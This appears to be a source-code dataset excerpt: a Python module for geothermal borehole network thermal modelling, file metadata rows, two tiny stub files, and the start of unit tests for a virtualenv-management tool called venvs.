into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (1, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (1, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_network_outlet_temperature is 3
method_id = 3
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Coefficient matrices for borehole outlet temperatures:
# [T_{f,b,out}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_outlet_temperature(
m_flow_network, cp_f, nSegments)
# Coefficient matrices for network outlet temperature:
# [T_{f,n,out}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
mix_out = self._coefficients_mixing(m_flow_network)
a_in = mix_out @ b_in
a_b = mix_out @ b_b
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_borehole_heat_extraction_rate(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate heat extraction rates of all
boreholes segments.
Returns coefficients for the relation:
.. math::
\\mathbf{Q_b} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (nTotalSegments, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (nTotalSegments, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_borehole_heat_extraction_rate is 4
method_id = 4
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Update input variables
self._format_inputs(m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_inlet_temperature(
m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole heat extraction rates:
# [Q_{b}] = [A]*[T_{f,b,in}] + [B]*[T_{b}]
AB = list(zip(*[
self.p[i].coefficients_borehole_heat_extraction_rate(
self._m_flow_borehole[i],
self._cp_borehole[i],
self.nSegments[i])
for i in range(self.nBoreholes)]))
A = block_diag(*AB[0])
B = block_diag(*AB[1])
# Coefficient matrices for borehole heat extraction rates:
# [Q_{b}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
a_in = A @ b_in
a_b = A @ b_b + B
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_fluid_heat_extraction_rate(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate heat extraction rates of all
boreholes.
Returns coefficients for the relation:
.. math::
\\mathbf{Q_f} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (nBoreholes, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (nBoreholes, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_fluid_heat_extraction_rate is 5
method_id = 5
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Update input variables
self._format_inputs(m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_inlet_temperature(
m_flow_network, cp_f, nSegments)
# Coefficient matrices for fluid heat extraction rates:
# [Q_{f}] = [A]*[T_{f,b,in}] + [B]*[T_{b}]
AB = list(zip(*[
self.p[i].coefficients_fluid_heat_extraction_rate(
self._m_flow_borehole[i],
self._cp_borehole[i],
self.nSegments[i])
for i in range(self.nBoreholes)]))
A = block_diag(*AB[0])
B = block_diag(*AB[1])
# Coefficient matrices for fluid heat extraction rates:
# [Q_{f}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
a_in = A @ b_in
a_b = A @ b_b + B
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_network_heat_extraction_rate(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate total heat extraction rate of
the network.
Returns coefficients for the relation:
.. math::
\\mathbf{Q_network} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (1, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (1, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_network_heat_extraction_rate is 6
method_id = 6
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Coefficient matrices for fluid heat extraction rates:
# [Q_{f}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_fluid_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
# The total network heat extraction rate is the sum of heat
# extraction rates from all boreholes:
# [Q_{tot}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
a_in = np.reshape(np.sum(b_in, axis=0), (1,-1))
a_b = np.reshape(np.sum(b_b, axis=0), (1,-1))
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def _coefficients_mixing(self, m_flow_network):
"""
Returns coefficients for the relation:
.. math::
T_{f,network,out} =
\\mathbf{a_{out}} \\mathbf{T_{f,borehole,out}}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
Returns
-------
mix_out : (1, nOutlets,) array
Array of coefficients for outlet fluid temperatures of all
boreholes.
"""
if not self._check_mixing_coefficients(m_flow_network):
self._mix_out = np.zeros((1, self.nBoreholes))
self._mix_out[0, self.iOutlets] = self._m_flow_in/np.sum(self._m_flow_in)
self._mixing_m_flow = m_flow_network
return self._mix_out
def _initialize_coefficients_connectivity(self):
"""
Initializes coefficients for the relation:
.. math::
\\mathbf{T_{f,borehole,in}} =
\\mathbf{c_{in}} T_{f,network,in}
+ \\mathbf{c_{out}} \\mathbf{T_{f,borehole,out}}
"""
self._c_in = np.zeros((self.nBoreholes, 1))
self._c_out = np.zeros((self.nBoreholes, self.nBoreholes))
for i in range(self.nInlets):
self._c_in[self.iInlets[i], 0] = 1.
for i in range(self.nBoreholes):
if not self.c[i] == -1:
self._c_out[i, self.c[i]] = 1.
return
def _initialize_stored_coefficients(self, m_flow_network, cp_f, nSegments):
nMethods = 7 # Number of class methods
self._stored_coefficients = [() for i in range(nMethods)]
self._stored_m_flow_cp = [np.empty(self.nInlets)
for i in range(nMethods)]
self._stored_nSegments = [np.nan for i in range(nMethods)]
self._m_flow_cp_model_variables = np.empty(self.nInlets)
self._nSegments_model_variables = np.nan
self._mixing_m_flow = np.empty(self.nInlets)
self._mixing_m_flow[:] = np.nan
self._mix_out = np.empty((1, self.nBoreholes))
self._mix_out[:] = np.nan
# If m_flow, cp_f, and nSegments are specified, evaluate and store all
# matrix coefficients.
if m_flow_network is not None and cp_f is not None and nSegments is not None:
self.coefficients_inlet_temperature(
m_flow_network, cp_f, nSegments)
self.coefficients_outlet_temperature(
m_flow_network, cp_f, nSegments)
self.coefficients_network_inlet_temperature(
m_flow_network, cp_f, nSegments)
self.coefficients_network_outlet_temperature(
m_flow_network, cp_f, nSegments)
self.coefficients_borehole_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
self.coefficients_fluid_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
self.coefficients_network_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
return
def _set_stored_coefficients(self, m_flow_network, cp_f, nSegments, coefficients,
method_id):
self._stored_coefficients[method_id] = coefficients
self._stored_m_flow_cp[method_id] = m_flow_network*cp_f
self._stored_nSegments[method_id] = nSegments
return
def _get_stored_coefficients(self, method_id):
coefficients = self._stored_coefficients[method_id]
return coefficients
def _check_mixing_coefficients(self, m_flow_network, tol=1e-6):
mixing_m_flow = self._mixing_m_flow
if np.all(np.abs(m_flow_network - mixing_m_flow) < np.abs(mixing_m_flow)*tol):
check = True
else:
check = False
return check
def _check_coefficients(self, m_flow_network, cp_f, nSegments, method_id, tol=1e-6):
stored_m_flow_cp = self._stored_m_flow_cp[method_id]
stored_nSegments = self._stored_nSegments[method_id]
if (np.all(np.abs(m_flow_network*cp_f - stored_m_flow_cp) < np.abs(stored_m_flow_cp)*tol)
and nSegments == stored_nSegments):
check = True
else:
check = False
return check
def _format_inputs(self, m_flow_network, cp_f, nSegments):
"""
Format mass flow rate and heat capacity inputs.
"""
# Format mass flow rate inputs
# Mass flow rate in each fluid circuit
m_flow_in = np.atleast_1d(m_flow_network)
if len(m_flow_in) == 1:
m_flow_in = np.tile(m_flow_network/self.nInlets, self.nInlets)
elif not len(m_flow_in) == self.nInlets:
raise ValueError(
'Incorrect length of mass flow vector.')
self._m_flow_in = m_flow_in
# Format heat capacity inputs
# Heat capacity in each fluid circuit
cp_in = np.atleast_1d(cp_f)
if len(cp_in) == 1:
cp_in = np.tile(cp_f, self.nInlets)
elif not len(cp_in) == self.nInlets:
raise ValueError(
'Incorrect length of heat capacity vector.')
elif not np.all(cp_in == cp_in[0]):
raise ValueError(
'The heat capacity should be the same in all circuits.')
self._cp_in = cp_in
# Mass flow rate in boreholes
m_flow_borehole = np.array([m_flow_in[i] for i in self.iCircuit])
self._m_flow_borehole = m_flow_borehole
# Heat capacity in boreholes
cp_borehole = np.array([cp_in[i] for i in self.iCircuit])
self._cp_borehole = cp_borehole
# Format number of segments for each borehole
nSeg = np.atleast_1d(nSegments)
if len(nSeg) == 1:
self.nSegments = [nSeg[0]] * self.nBoreholes
elif not len(nSeg) == self.nBoreholes:
raise ValueError(
'Incorrect length of number of segments list.')
else:
self.nSegments = nSegments
class _EquivalentNetwork(Network):
"""
Class for networks of equivalent boreholes with parallel connections
between the equivalent boreholes.
Contains information regarding the physical dimensions and thermal
characteristics of the pipes and the grout material in each boreholes, the
topology of the connections between boreholes, as well as methods to
evaluate fluid temperatures and heat extraction rates based on the work of
Cimmino (2018, 2019) [#Network-Cimmin2018]_, [#Network-Cimmin2019]_.
Attributes
----------
boreholes : list of Borehole objects
List of boreholes included in the bore field.
pipes : list of pipe objects
List of pipes included in the bore field.
m_flow_network : float or array, optional
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits. This
parameter is used to initialize the coefficients if it is provided.
Default is None.
cp_f : float, optional
Fluid specific isobaric heat capacity (in J/kg.degC). This parameter is
used to initialize the coefficients if it is provided.
Default is None.
nSegments : int, optional
Number of line segments used per borehole. This parameter is used to
initialize the coefficients if it is provided.
Default is None.
Notes
-----
The expected array shapes of input parameters and outputs are documented
for each class method. `nInlets` and `nOutlets` are the number of inlets
and outlets to the network, and both correspond to the number of parallel
circuits. `nTotalSegments` is the sum of the number of discretized segments
along every borehole. `nBoreholes` is the total number of boreholes in the
network.
References
----------
.. [#Network-Cimmin2018] Cimmino, M. (2018). g-Functions for bore fields with
mixed parallel and series connections considering the axial fluid
temperature variations. Proceedings of the IGSHPA Sweden Research Track
2018. Stockholm, Sweden. pp. 262-270.
.. [#Network-Cimmin2019] Cimmino, M. (2019). Semi-analytical method for
g-function calculation of bore fields with series- and
parallel-connected boreholes. Science and Technology for the Built
Environment, 25 (8), 1007-1022.
"""
def __init__(self, equivalentBoreholes, pipes, m_flow_network=None,
cp_f=None, nSegments=None):
self.b = equivalentBoreholes
self.H_tot = sum([b.H*b.nBoreholes for b in self.b])
self.nBoreholes = len(equivalentBoreholes)
self.wBoreholes = np.array([[b.nBoreholes for b in equivalentBoreholes]]).T
self.nBoreholes_total = np.sum(self.wBoreholes)
self.p = pipes
self.c = [-1]*self.nBoreholes
self.m_flow_network = m_flow_network
self.cp_f = cp_f
# Verify that borehole connectivity is valid
iInlets, nInlets, iOutlets, nOutlets, iCircuit = _find_inlets_outlets(
self.c, self.nBoreholes)
# Number of inlets and outlets in network
self.nInlets = nInlets
self.nOutlets = nOutlets
# Indices of inlets and outlets in network
self.iInlets = iInlets
self.iOutlets = iOutlets
# Indices of circuit of each borehole in network
self.iCircuit = iCircuit
# Initialize stored_coefficients
self._initialize_coefficients_connectivity()
self._initialize_stored_coefficients(m_flow_network, cp_f, nSegments)
return
def coefficients_network_heat_extraction_rate(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate total heat extraction rate of
the network.
Returns coefficients for the relation:
.. math::
\\mathbf{Q_network} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (1, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (1, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_network_heat_extraction_rate is 6
method_id = 6
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Coefficient matrices for fluid heat extraction rates:
# [Q_{f}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_fluid_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
# The total network heat extraction rate is the sum of heat
# extraction rates from all boreholes:
# [Q_{tot}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
a_in = np.reshape(np.sum(b_in*self.wBoreholes, axis=0), (1,-1))
a_b = np.reshape(np.sum(b_b*self.wBoreholes, axis=0), (1,-1))
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def _coefficients_mixing(self, m_flow_network):
"""
Returns coefficients for the relation:
.. math::
T_{f,network,out} =
\\mathbf{a_{out}} \\mathbf{T_{f,borehole,out}}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
Returns
-------
mix_out : (1, nOutlets,) array
Array of coefficients for outlet fluid temperatures of all
boreholes.
"""
if not self._check_mixing_coefficients(m_flow_network):
self._mix_out = np.zeros((1, self.nBoreholes))
self._mix_out[0, self.iOutlets] = \
self._m_flow_in * self.wBoreholes.flatten() \
/ np.sum(self._m_flow_in * self.wBoreholes.flatten())
self._mixing_m_flow = m_flow_network
return self._mix_out
def _format_inputs(self, m_flow_network, cp_f, nSegments):
"""
Format mass flow rate and heat capacity inputs.
"""
# Format mass flow rate inputs
# Mass flow rate in each fluid circuit
m_flow_in = np.atleast_1d(m_flow_network)
if len(m_flow_in) == 1:
m_flow_in = np.array(
[m_flow_network/self.nBoreholes_total for b in self.b])
elif not len(m_flow_in) == self.nInlets:
raise ValueError(
'Incorrect length of mass flow vector.')
self._m_flow_in = m_flow_in
# Format heat capacity inputs
# Heat capacity in each fluid circuit
cp_in = np.atleast_1d(cp_f)
if len(cp_in) == 1:
cp_in = np.tile(cp_f, self.nInlets)
elif not len(cp_in) == self.nInlets:
raise ValueError(
'Incorrect length of heat capacity vector.')
elif not np.all(cp_in == cp_in[0]):
raise ValueError(
'The heat capacity should be the same in all circuits.')
self._cp_in = cp_in
# Mass flow rate in boreholes
m_flow_borehole = np.array([m_flow_in[i] for i in self.iCircuit])
self._m_flow_borehole = m_flow_borehole
# Heat capacity in boreholes
cp_borehole = np.array([cp_in[i] for i in self.iCircuit])
self._cp_borehole = cp_borehole
# Format number of segments for each borehole
nSeg = np.atleast_1d(nSegments)
if len(nSeg) == 1:
self.nSegments = [nSegments for i in range(self.nBoreholes)]
elif not len(nSeg) == self.nBoreholes:
raise ValueError(
'Incorrect length of number of segments list.')
else:
self.nSegments = nSegments
def network_thermal_resistance(network, m_flow_network, cp_f):
"""
Evaluate the effective bore field thermal resistance.
As proposed in Cimmino (2018, 2019) [#Network-Cimmin2018]_,
[#Network-Cimmin2019]_.
Parameters
----------
network : network object
Model of the network.
m_flow_network : float or (nInlets, ) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
Returns
-------
R_field : float
Effective bore field thermal resistance (m.K/W).
"""
# Number of boreholes
nBoreholes = len(network.b)
# Total borehole length
H_tot = network.H_tot
# Coefficients for T_{f,out} = A_out*T_{f,in} + [B_out]*[T_b], and
# Q_b = [A_Q]*T{f,in} + [B_Q]*[T_b]
A_out, B_out = network.coefficients_network_outlet_temperature(
m_flow_network, cp_f, 1)
A_Q, B_Q = network.coefficients_network_heat_extraction_rate(
m_flow_network, cp_f, 1)
# Effective bore field thermal resistance
R_field = -0.5*H_tot*(1. + A_out)/A_Q
if not np.isscalar(R_field):
R_field = R_field.item()
return R_field
def _find_inlets_outlets(bore_connectivity, nBoreholes):
"""
Finds the numbers of boreholes connected to the inlet and outlet of the
network and the indices of the boreholes.
This function raises an error if the supplied borehole connectivity is
invalid.
Parameters
----------
bore_connectivity : list
Index of fluid inlet into each borehole. -1 corresponds to a borehole
connected to the bore field inlet.
nBoreholes : int
Number of boreholes in the bore field.
"""
# Number and indices of inlets
nInlets = bore_connectivity.count(-1)
iInlets = [i for i in range(nBoreholes) if bore_connectivity[i]==-1]
# Number and indices of outlets
iOutlets = [i for i in range(nBoreholes) if i not in bore_connectivity]
nOutlets = len(iOutlets)
iCircuit = [iInlets.index(_path_to_inlet(bore_connectivity, i)[-1])
for i in range(nBoreholes)]
if not nInlets == nOutlets:
raise ValueError(
'The network should have as many inlets as outlets.')
return iInlets, nInlets, iOutlets, nOutlets, iCircuit
def _path_to_inlet(bore_connectivity, bore_index):
"""
Returns the path from a borehole to the bore field inlet.
Parameters
----------
bore_connectivity : list
Index of fluid inlet into each borehole. -1 corresponds to a borehole
connected to the bore field inlet.
bore_index : int
Index of borehole to evaluate path.
Returns
-------
path : list
List of boreholes leading to the bore field inlet, starting from
borehole bore_index
"""
# Initialize path
path = [bore_index]
# Index of borehole feeding into borehole (bore_index)
index_in = bore_connectivity[bore_index]
# Stop when bore field inlet is reached (index_in == -1)
while not index_in == -1:
# Add index of upstream borehole to path
path.append(index_in)
# Get index of next upstream borehole
index_in = bore_connectivity[index_in]
return path
def _verify_bore_connectivity(bore_connectivity, nBoreholes):
"""
Verifies that borehole connectivity is valid.
This function raises an error if the supplied borehole connectivity is
invalid.
Parameters
----------
bore_connectivity : list
Index of fluid inlet into each borehole. -1 corresponds to a borehole
connected to the bore field inlet.
nBoreholes : int
Number of boreholes in the bore field.
"""
if not len(bore_connectivity) == nBoreholes:
raise ValueError(
'The length of the borehole connectivity list does not correspond '
'to the number of boreholes in the bore field.')
if max(bore_connectivity) >= nBoreholes:
raise ValueError(
'The borehole connectivity list contains borehole indices that '
'are not part of the network.')
# Cycle through each borehole and verify that connections lead to -1
# (-1 is the bore field inlet) and that no two boreholes have the same
# index of fluid inlet (except for -1).
for i in range(nBoreholes):
n = 0 # Initialize step counter
# Index of borehole feeding into borehole i
index_in = bore_connectivity[i]
if index_in != -1 and bore_connectivity.count(index_in) > 1:
raise ValueError(
'Two boreholes cannot have the same inlet, except fort the '
'network inlet (index of -1).')
# Stop when bore field inlet is reached (index_in == -1)
while not index_in == -1:
index_in = bore_connectivity[index_in]
n += 1 # Increment step counter
# Raise error if n exceeds the number of boreholes
if n > nBoreholes:
raise ValueError(
'The borehole connectivity list is invalid.')
return
| 40.057122
| 97
| 0.608756
| 7,136
| 53,997
| 4.411295
| 0.044142
| 0.023984
| 0.040789
| 0.029798
| 0.875218
| 0.845707
| 0.827599
| 0.810604
| 0.795451
| 0.789256
| 0
| 0.006733
| 0.312332
| 53,997
| 1,347
| 98
| 40.08686
| 0.841027
| 0.509658
| 0
| 0.593258
| 0
| 0
| 0.032815
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069663
| false
| 0
| 0.004494
| 0
| 0.141573
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
74ad45807d20f2bb04bbb621c0c105296cfdb112
| 44
|
py
|
Python
|
anime_dl/__init__.py
|
tiagotda/anime-dl
|
d3c114faaa7586b4e1111efa2cf79d4640d4f6a9
|
[
"MIT"
] | 246
|
2017-03-04T20:17:19.000Z
|
2022-03-28T13:37:16.000Z
|
anime_dl/__init__.py
|
EpicUnknown/anime-dl
|
753ae274243c3c4d52050f0c09778d9278112d4a
|
[
"MIT"
] | 114
|
2017-03-05T23:30:04.000Z
|
2021-01-17T03:57:59.000Z
|
anime_dl/__init__.py
|
EpicUnknown/anime-dl
|
753ae274243c3c4d52050f0c09778d9278112d4a
|
[
"MIT"
] | 59
|
2017-03-05T03:00:53.000Z
|
2022-01-08T11:23:21.000Z
|
import common
import external
import sites
| 8.8
| 15
| 0.840909
| 6
| 44
| 6.166667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 4
| 16
| 11
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
741fb58b993842e8061efc5a082a013cf51143a2
| 27
|
py
|
Python
|
exercises/accumulate/accumulate.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 1
|
2021-05-15T19:59:04.000Z
|
2021-05-15T19:59:04.000Z
|
exercises/accumulate/accumulate.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | null | null | null |
exercises/accumulate/accumulate.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 2
|
2018-03-03T08:32:12.000Z
|
2019-08-22T11:55:53.000Z
|
def accumulate():
pass
| 9
| 17
| 0.62963
| 3
| 27
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 27
| 2
| 18
| 13.5
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
74a67040bc142c4f02323aab72be4f8393444d19
| 21,191
|
py
|
Python
|
venvs/tests/test_converge.py
|
Julian/mkenv
|
3e42685c13fa2681ce322a4dd26b4710c292fa51
|
[
"MIT"
] | 9
|
2017-02-05T13:06:55.000Z
|
2018-08-13T12:46:39.000Z
|
venvs/tests/test_converge.py
|
Julian/venvs
|
16fb04e6bd5d22a4af3e03c806d8ff9624f1ad8b
|
[
"MIT"
] | 73
|
2018-08-28T09:56:49.000Z
|
2022-01-30T16:32:24.000Z
|
venvs/tests/test_converge.py
|
Julian/venvs
|
16fb04e6bd5d22a4af3e03c806d8ff9624f1ad8b
|
[
"MIT"
] | 6
|
2018-12-09T22:14:45.000Z
|
2021-03-23T17:52:31.000Z
|
from datetime import datetime, timedelta
from tempfile import NamedTemporaryFile
from unittest import TestCase
import os
from filesystems.exceptions import FileExists
from venvs import _config
from venvs.tests.utils import CLIMixin
class TestConverge(CLIMixin, TestCase):
def test_it_creates_missing_virtualenvs(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("b").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("c").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
install = ["foo", "bar", "bla"]
requirements = ["requirements.txt"]
[virtualenv.c]
install = ["foo", "$HOME", "~/a"]
link = ["bar", "baz"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.installed(self.locator.for_name("c")),
), (
(set(), set()),
({"foo", "bar", "bla"}, {"requirements.txt"}),
(
{
"foo",
os.path.expandvars("$HOME"),
os.path.expanduser("~/a"),
},
set(),
),
),
)
def test_it_converges_existing_virtualenvs(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("b").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("c").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
install = ["foo", "bar"]
requirements = ["requirements.txt"]
""",
)
self.run_cli(["converge"])
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
install = ["baz", "quux"]
requirements = ["requirements.txt", "other.txt"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"baz", "quux"}, {"requirements.txt", "other.txt"}),
)
def test_it_converges_specified_virtualenvs(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("b").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("c").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
install = ["foo", "bar", "bla"]
requirements = ["requirements.txt"]
[virtualenv.c]
install = ["foo"]
link = ["bar", "baz"]
""",
)
self.run_cli(["converge", "a", "c"])
self.assertTrue(self.locator.for_name("a").exists_on(self.filesystem))
self.assertFalse(self.locator.for_name("b").exists_on(self.filesystem))
self.assertTrue(self.locator.for_name("c").exists_on(self.filesystem))
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.installed(self.locator.for_name("c")),
), (
(set(), set()),
(set(), set()),
({"foo"}, set()),
),
)
def test_it_runs_post_commands(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
file = NamedTemporaryFile(delete=False)
self.addCleanup(os.remove, file.name)
mtime = os.path.getmtime(file.name)
new_mtime = datetime.fromtimestamp(mtime) + timedelta(minutes=10)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), f"""
[virtualenv.a]
post-commands = [
["true"],
["touch", "-t", "{new_mtime:%Y%m%d%H%M}", "{file.name}"],
]
""",
)
self.run_cli(["converge"])
self.assertTrue(self.locator.for_name("a").exists_on(self.filesystem))
self.assertGreater(os.path.getmtime(file.name), mtime)
def test_it_does_not_run_post_commands_for_already_converged_envs(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
file = NamedTemporaryFile(delete=False)
self.addCleanup(os.remove, file.name)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), f"""
[virtualenv.a]
post-commands = [
["true"],
["touch", "{file.name}"],
]
""",
)
self.run_cli(["converge"])
mtime = os.path.getmtime(file.name)
self.run_cli(["converge"])
self.assertEqual(os.path.getmtime(file.name), mtime)
def test_it_stops_post_commands_on_error(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
